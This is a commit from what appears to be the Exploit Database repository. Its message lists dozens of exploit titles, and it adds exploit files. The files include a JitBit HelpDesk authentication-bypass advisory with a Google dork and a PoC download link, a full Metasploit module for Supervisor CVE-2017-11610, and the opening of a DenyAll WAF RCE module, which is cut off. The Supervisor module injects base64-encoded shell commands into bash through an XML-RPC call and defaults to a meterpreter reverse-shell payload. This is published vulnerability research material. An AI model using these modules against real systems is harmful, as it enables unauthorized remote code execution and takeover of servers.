DB: 2017-09-26
12 new exploits Apache 2.0.52 - GET Request Denial of Service Apache 2.0.52 - GET Denial of Service CUPS Server 1.1 - GET Request Denial of Service CUPS Server 1.1 - GET Denial of Service BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service BlueCoat WinProxy 6.0 R1c - GET Denial of Service TFTPD32 2.81 - GET Request Format String Denial of Service (PoC) TFTPD32 2.81 - GET Format String Denial of Service (PoC) ImgSvr 0.6.5 - (long http post) Denial of Service ImgSvr 0.6.5 - POST Denial of Service Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service Multi-Threaded TFTP 1.1 - GET Denial of Service Essentia Web Server 2.15 - GET Request Remote Denial of Service Essentia Web Server 2.15 - GET Remote Denial of Service Sami HTTP Server 2.0.1 - POST Request Denial of Service Sami HTTP Server 2.0.1 - POST Denial of Service Xserver 0.1 Alpha - Post Request Remote Buffer Overflow Xserver 0.1 Alpha - POST Remote Buffer Overflow XBMC 8.10 - GET Requests Multiple Remote Buffer Overflow (PoC) XBMC 8.10 - GET Multiple Remote Buffer Overflow (PoC) Zervit Web Server 0.04 - GET Request Remote Buffer Overflow (PoC) Mereo 1.8.0 - GET Request Remote Denial of Service Zervit Web Server 0.04 - GET Remote Buffer Overflow (PoC) Mereo 1.8.0 - GET Remote Denial of Service ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service ARD-9808 DVR Card Security Camera - GET Remote Denial of Service Kolibri+ Web Server 2 - GET Request Denial of Service Kolibri+ Web Server 2 - GET Denial of Service Adobe InDesign CS3 - '.INDD' File Handling Buffer Overflow Adobe InDesign CS3 - '.INDD' Handling Buffer Overflow Sami HTTP Server 2.0.1 - GET Request Denial of Service Sami HTTP Server 2.0.1 - GET Denial of Service Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Exploit (Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service (Linux Kernel) ReiserFS 3.5.28 - Code Execution / Denial of Service WebTrends Reporting Center for Windows 4.0 d - GET Request Buffer Overflow WebTrends Reporting Center for Windows 4.0 d - GET Buffer Overflow Working Resources BadBlue 1.7.3 - GET Request Denial of Service Working Resources BadBlue 1.7.3 - GET Denial of Service PlanetWeb 1.14 - Long GET Request Buffer Overflow PlanetWeb 1.14 - GET Buffer Overflow My Web Server 1.0.1/1.0.2 - Long GET Request Denial of Service My Web Server 1.0.1/1.0.2 - GET Denial of Service Monkey HTTP Server 0.4/0.5 - Invalid POST Request Denial of Service Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service Linksys Devices 1.42/1.43 - GET Request Buffer Overflow Linksys Devices 1.42/1.43 - GET Buffer Overflow Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service VisNetic ActiveDefense 1.3.1 - Multiple GET Request Denial of Service VisNetic ActiveDefense 1.3.1 - GET Multiple Denial of Service Pi3Web 2.0.1 - GET Request Denial of Service Pi3Web 2.0.1 - GET Denial of Service Snowblind Web Server 1.0/1.1 - GET Request Buffer Overflow Snowblind Web Server 1.0/1.1 - GET Buffer Overflow ArGoSoft Mail Server 1.8.3.5 - Multiple GET Requests Denial of Service WebBBS Pro 1.18 - GET Request Denial of Service ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service WebBBS Pro 1.18 - GET Denial of Service Proxomitron Proxy Server - Long GET Request Remote Denial of Service Proxomitron Proxy Server - GET Remote Denial of Service Armida Databased Web Server 1.0 - Remote GET Request Denial of Service Armida Databased Web Server 1.0 - GET Remote Denial of Service Twilight WebServer 1.3.3.0 - 'GET' Request Buffer Overflow Twilight WebServer 1.3.3.0 - GET Buffer Overflow Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service Sami FTP Server 1.1.3 - Library Crafted GET Remote Denial of Service Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service Loom Software SurfNow 1.x/2.x - GET Remote Denial of Service Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow Sambar Server 6.0 - 'results.stm' POST Buffer Overflow Linksys PSUS4 PrintServer - POST Request Denial of Service Linksys PSUS4 PrintServer - POST Denial of Service Thomson TCW690 Cable Modem ST42.03.0a - Long GET Request Denial of Service Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service Netgear ProSafe - Denial of Service NETGEAR ProSafe - Denial of Service Multiple IEA Software Products - POST Request Denial of Service Multiple IEA Software Products - POST Denial of Service Netgear WGR614 - Administration Interface Remote Denial of Service NETGEAR WGR614 - Administration Interface Remote Denial of Service Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service Remote Help HTTP 0.0.7 - GET Format String Denial of Service Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service Geo++ GNCASTER 1.4.0.7 - GET Denial of Service D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow D-Link WBR-2310 1.0.4 - GET Remote Buffer Overflow Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial of Service Polipo 1.0.4.1 - POST/PUT HTTP Header Processing Denial of Service CoDeSys 3.4 - HTTP POST Request Null Pointer Content-Length Parsing Remote Denial of Service CoDeSys 3.4 - HTTP POST Null Pointer Content-Length Parsing Remote Denial of Service Zoom Player - '.avi' File Divide-by-Zero Denial of Service Zoom Player - '.avi' Divide-by-Zero Denial of Service Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.SWF' File (1) Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.SWF' File (2) Adobe Flash - '.SWF' Out-of-Bounds Memory Read (1) Adobe Flash - '.SWF' Out-of-Bounds Memory Read (2) Microsoft Windows - Cursor Object Potential Memory Leak (MS15-115) Microsoft Windows - Cursor Object Memory Leak (MS15-115) Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1) Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (2) Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1) Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2) Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption Adobe Flash - '.MP4' File Stack Corruption Adobe Flash - '.MP4' Stack Corruption Adobe Photoshop CS2 / CS3 - Unspecified '.bmp' File Buffer Overflow Adobe Photoshop CS2 / CS3 - '.bmp' Buffer Overflow Zoom Player Pro 3.30 - '.m3u' File Buffer Overflow (SEH) Zoom Player Pro 3.30 - '.m3u' Buffer Overflow (SEH) Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Potential Information Disclosure Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure Adrenalin Player 2.2.5.3 - '.m3u' File Buffer Overflow (SEH) (ASLR + DEP Bypass) Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) (ASLR + DEP Bypass) Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode) LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Remote Exploit PMSoftware Simple Web Server - GET Request Remote Buffer Overflow PMSoftware Simple Web Server - GET Remote Buffer Overflow Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow Fenice Oms 1.10 - GET Remote Buffer Overflow webdesproxy 0.0.1 - GET Request Remote Buffer Overflow webdesproxy 0.0.1 - GET Remote Buffer Overflow webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution webdesproxy 0.0.1 - (exec-shield) GET Remote Code Execution Savant Web Server 3.1 - GET Request Remote Overflow (Universal) Savant Web Server 3.1 - GET Remote Overflow (Universal) Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass Belkin F5D9230-4 Wireless G Plus MIMO Router - Authentication Bypass Netgear WG102 - Leaks SNMP Write Password With Read Access NETGEAR WG102 - Leaks SNMP Write Password With Read Access XBMC 8.10 (Windows) - GET Request Remote Buffer Overflow XBMC 8.10 (Windows) - GET Remote Buffer Overflow XBMC 8.10 - GET Request Remote Buffer Overflow (SEH) (Universal) XBMC 8.10 - GET Remote Buffer Overflow (SEH) (Universal) Netgear WNR2000 FW 1.2.0.8 - Information Disclosure NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure Kolibri+ Web Server 2 - GET Request Remote Overwrite (SEH) Kolibri+ Web Server 2 - GET Remote Overwrite (SEH) BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH) BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH) BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH) httpdx 1.4 - GET Request Buffer Overflow httpdx 1.4 - GET Buffer Overflow Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit) NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit) Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow (Metasploit) Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit) Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit) Linksys WRT54 Access Point - apply.cgi Buffer Overflow (Metasploit) Oracle Weblogic Apache Connector - POST Request Buffer Overflow (Metasploit) Oracle Weblogic Apache Connector - POST Buffer Overflow (Metasploit) Berkeley Sendmail 5.58 - Debug exploit Berkeley Sendmail 5.58 - Debug Exploit A-V Tronics InetServ 3.0 - WebMail Long GET Request A-V Tronics InetServ 3.0 - WebMail GET Exploit Light HTTPD 0.1 - GET Request Buffer Overflow (1) Light HTTPD 0.1 - GET Request Buffer Overflow (2) Light HTTPD 0.1 - GET Buffer Overflow (1) Light HTTPD 0.1 - GET Buffer Overflow (2) Netgear FM114P Wireless Firewall - File Disclosure NETGEAR FM114P Wireless Firewall - File Disclosure Athttpd 0.4b - Remote GET Request Buffer Overrun Athttpd 0.4b - GET Remote Buffer Overrun IA WebMail Server 3.0/3.1 - Long GET Request Buffer Overrun IA WebMail Server 3.0/3.1 - GET Buffer Overrun Monit 1.4/2.x/3/4 - Overly Long HTTP Request Buffer Overrun Monit 1.4/2.x/3/4 - Long HTTP Request Buffer Overrun KarjaSoft Sami HTTP Server 1.0.4 - GET Request Buffer Overflow KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow MyWeb HTTP Server 3.3 - GET Request Buffer Overflow MyWeb HTTP Server 3.3 - GET Buffer Overflow Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow Omnicron OmniHTTPd 2.x/3.0 - GET Buffer Overflow Netgear RP114 3.26 - Content Filter Bypass NETGEAR RP114 3.26 - Content Filter Bypass Netgear DGN1000B - setup.cgi Remote Command Execution (Metasploit) NETGEAR DGN1000B - setup.cgi Remote Command Execution (Metasploit) Netgear DGN2200B - pppoe.cgi Remote Command Execution (Metasploit) NETGEAR DGN2200B - pppoe.cgi Remote Command Execution (Metasploit) Netgear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow NETGEAR MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow Netgear ReadyNAS - Perl Code Evaluation (Metasploit) NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit) Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting Zoom Player 3.30/5/6 - Crafted '.ZPL' File Error Message Arbitrary Code Execution Zoom Player 3.30/5/6 - '.ZPL' Error Message Arbitrary Code Execution Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow Ultra Mini HTTPD 1.21 - POST Stack Buffer Overflow Kolibri Web Server 2.0 - GET Request Stack Buffer Overflow Kolibri Web Server 2.0 - GET Stack Buffer Overflow NetGear WNR2000 - Multiple Information Disclosure Vulnerabilities NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities HTTP 1.1 - GET Request Directory Traversal HTTP 1.1 - GET Directory Traversal Kolibri Web Server 2.0 - GET Request (SEH) D-Link Devices - 'info.cgi' POST Request Buffer Overflow (Metasploit) Kolibri Web Server 2.0 - GET Exploit (SEH) D-Link Devices - 'info.cgi' POST Buffer Overflow (Metasploit) Belkin n750 - jump login Parameter Buffer Overflow Belkin N750 - jump login Parameter Buffer Overflow Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities Belkin Wireless Router Default - WPS PIN Security Belkin Wireless Router - Default WPS PIN Security Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET Buffer Overflow (SEH) Netgear D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution NETGEAR D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit) NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit) NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure NETGEAR JNR1010 ADSL Router - Authenticated Remote File Disclosure NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - Authenticated Remote File Disclosure Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit) NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit) Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (SEH) Supervisor 3.0a1 - 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit) Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit) NETGEAR DGN2200 - dnslookup.cgi Command Injection (Metasploit) Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass) Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (DEP Bypass) Belkin NetCam F7D7601 - Multiple Vulnerabilities Belkin F7D7601 NetCam - Multiple Vulnerabilities Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH) Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow Quezza BB 1.0 - (quezza_root_path) File Inclusion Quezza BB 1.0 - 'quezza_root_path' File Inclusion The Bible Portal Project 2.12 - (destination) File Inclusion The Bible Portal Project 2.12 - 'destination' File Inclusion Vivvo Article Manager 3.2 - (classified_path) File Inclusion Vivvo Article Manager 3.2 - 'classified_path' File Inclusion Forum82 < 2.5.2b - (repertorylevel) Multiple File Inclusion Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusion OpenDock Easy Doc 1.4 - (doc_directory) File Inclusion OpenDock Easy Blog 1.4 - (doc_directory) File Inclusion WebYep 1.1.9 - (webyep_sIncludePath) File Inclusion OpenDock Easy Gallery 1.4 - (doc_directory) File Inclusion OpenDock Easy Doc 1.4 - 'doc_directory' File Inclusion OpenDock Easy Blog 1.4 - 'doc_directory' File Inclusion WebYep 1.1.9 - 'webyep_sIncludePath' File Inclusion OpenDock Easy Gallery 1.4 - 'doc_directory' File Inclusion Open Conference Systems 1.1.4 - (fullpath) File Inclusion Open Conference Systems 1.1.4 - 'fullpath' File Inclusion SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion SpeedBerg 1.2beta1 - 'SPEEDBERG_PATH' File Inclusion PhpShop Core 0.9.0 RC1 - (PS_BASE) File Inclusion PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion Phpjobscheduler 3.0 - (installed_config_file) File Inclusion Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion Magic Photo Storage Website - _config[site_path] File Inclusion Magic Photo Storage Website - '_config[site_path]' File Inclusion Linksys Cisco WAG120N - Cross-Site Request Forgery Cisco Linksys WAG120N - Cross-Site Request Forgery Belkin G Wireless Router F5D7234-4 v5 - Exploit Belkin F5D7234-4 v5 G Wireless Router - Exploit Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery PHP-Nuke 6.x/7.x - Modpath Parameter Potential File Inclusion PHP-Nuke 6.x/7.x - 'Modpath' Parameter File Inclusion Netgear SPH200D - Multiple Vulnerabilities NETGEAR SPH200D - Multiple Vulnerabilities Netgear DGN1000B - Multiple Vulnerabilities NETGEAR DGN1000B - Multiple Vulnerabilities Netgear DGN2200B - Multiple Vulnerabilities NETGEAR DGN2200B - Multiple Vulnerabilities Netgear WNR1000 - Authentication Bypass NETGEAR WNR1000 - Authentication Bypass PHPMyVisites 1.3 - Set_Lang File Inclusion PHPMyVisites 1.3 - 'Set_Lang' File Inclusion PPA 0.5.6 - ppa_root_path File Inclusion PPA 0.5.6 - 'ppa_root_path' File Inclusion Netgear WPN824v3 - Unauthorized Config Download NETGEAR WPN824v3 - Unauthorized Config Download Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities Netgear ProSafe - Information Disclosure NETGEAR ProSafe - Information Disclosure Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass Netgear N600 Wireless Dual Band WNDR3400 - Multiple Vulnerabilities NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass Belkin AC1200 Router Firmware 1.00.27 - Authentication Bypass Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure ManageEngine ADSelfService Plus 4.4 - POST Request Manipulation Security Question ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities Belkin Router N150 1.00.08/1.00.09 - Directory Traversal Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / Denial of Service) eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service) Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities Belkin N150 Wireless Router F9K1009 v1 - Multiple Vulnerabilities Netgear WNR1000v4 - Authentication Bypass NETGEAR WNR1000v4 - Authentication Bypass Netgear ProSafe Network Management System NMS300 - Multiple Vulnerabilities NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities Netgear R7000 - Command Injection Netgear R7000 - Cross-Site Scripting NETGEAR R7000 - Command Injection NETGEAR R7000 - Cross-Site Scripting Tenda N3 Wireless N150 Home Router - Authentication Bypass Tenda N3 Wireless N150 Router - Authentication Bypass DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit) Lending And Borrowing - 'pid' Parameter SQL Injection Multi Level Marketing - SQL Injection Cash Back Comparison Script 1.0 - SQL Injection Claydip Airbnb Clone 1.0 - Arbitrary File Upload Secure E-commerce Script 1.02 - 'sid' Parameter SQL Injection PHP Auction Ecommerce Script 1.6 - SQL Injection JitBit HelpDesk < 9.0.2 - Authentication Bypass
This commit is contained in:
parent
90ecd7f9e4
commit
f27338c1f7
17 changed files with 1846 additions and 448 deletions
13
platforms/asp/webapps/42776.txt
Executable file
13
platforms/asp/webapps/42776.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
# Exploit Title: JitBit HelpDesk <= 9.0.2 Broken Authentication
|
||||
# Google Dork: "Powered by Jitbit HelpDesk" -site:jitbit.com
|
||||
# Date: 09/22/2017
|
||||
# Exploit Author: Rob Simon (Kc57) - TrustedSec www.trustedsec.com
|
||||
# Vendor Homepage: https://www.jitbit.com/helpdesk/
|
||||
# Download Link: https://static.jitbit.com/HelpDeskTrial.zip
|
||||
# Version: 9.0.2
|
||||
# Tested on: Windows Server 2012
|
||||
# CVE : NA
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42776.zip
|
169
platforms/linux/remote/42779.rb
Executable file
169
platforms/linux/remote/42779.rb
Executable file
|
@ -0,0 +1,169 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Supervisor XML-RPC Authenticated Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
|
||||
can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
|
||||
The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
|
||||
may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
|
||||
configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Calum Hutton <c.e.hutton@gmx.com>'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
|
||||
['URL', 'https://www.debian.org/security/2017/dsa-3942'],
|
||||
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'],
|
||||
['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
|
||||
['CVE', '2017-11610']
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Targets' =>
|
||||
[
|
||||
['3.0a1-3.3.2', {}]
|
||||
],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'RPORT' => 9001,
|
||||
'Payload' => 'linux/x64/meterpreter/reverse_tcp',
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Jul 19 2017',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9001),
|
||||
OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),
|
||||
OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),
|
||||
OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def check_version(version)
|
||||
if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
print_status('Extracting version from web interface..')
|
||||
|
||||
params = {
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('/')
|
||||
}
|
||||
if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
|
||||
print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
|
||||
params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
|
||||
end
|
||||
res = send_request_cgi(params)
|
||||
|
||||
if res
|
||||
if res.code == 200
|
||||
match = res.body.match(/<span>(\d+\.[\dab]\.\d+)<\/span>/)
|
||||
if match
|
||||
version = Gem::Version.new(match[1])
|
||||
if check_version(version)
|
||||
print_good("Vulnerable version found: #{version}")
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
print_bad("Version #{version} is not vulnerable")
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
else
|
||||
print_bad('Could not extract version number from web interface')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
elsif res.code == 401
|
||||
print_bad("Authentication failed: #{res.code} response")
|
||||
return Exploit::CheckCode::Safe
|
||||
else
|
||||
print_bad("Unexpected HTTP code: #{res.code} response")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
else
|
||||
print_bad('Error connecting to web interface')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
||||
# XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server
|
||||
# Credit to the following urls for the os.system() payload
|
||||
# https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610
|
||||
# https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
|
||||
xml_payload = %{<?xml version="1.0"?>
|
||||
<methodCall>
|
||||
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
|
||||
<params>
|
||||
<param>
|
||||
<string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &</string>
|
||||
</param>
|
||||
</params>
|
||||
</methodCall>}
|
||||
|
||||
# Send the XML-RPC payload via POST to the specified endpoint
|
||||
endpoint_path = target_uri.path
|
||||
print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}")
|
||||
|
||||
params = {
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(endpoint_path),
|
||||
'ctype' => 'text/xml',
|
||||
'headers' => {'Accept' => 'text/xml'},
|
||||
'data' => xml_payload,
|
||||
'encode_params' => false
|
||||
}
|
||||
if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
|
||||
print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
|
||||
params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
|
||||
end
|
||||
return send_request_cgi(params, timeout=5)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
res = execute_cmdstager(:linemax => 800)
|
||||
|
||||
if res
|
||||
if res.code == 401
|
||||
fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response")
|
||||
elsif res.code == 404
|
||||
fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response")
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
|
||||
end
|
||||
else
|
||||
print_good('Request returned without status code, usually indicates success. Passing to handler..')
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
103
platforms/linux/webapps/42769.rb
Executable file
103
platforms/linux/webapps/42769.rb
Executable file
|
@ -0,0 +1,103 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "DenyAll Web Application Firewall Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
|
||||
terminal command under the context of the web server user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'RPORT' => 3001,
|
||||
'Payload' => 'python/meterpreter/reverse_tcp'
|
||||
},
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Sep 19 2017",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def get_token
|
||||
# Taking token by exploiting bug on first endpoint.
|
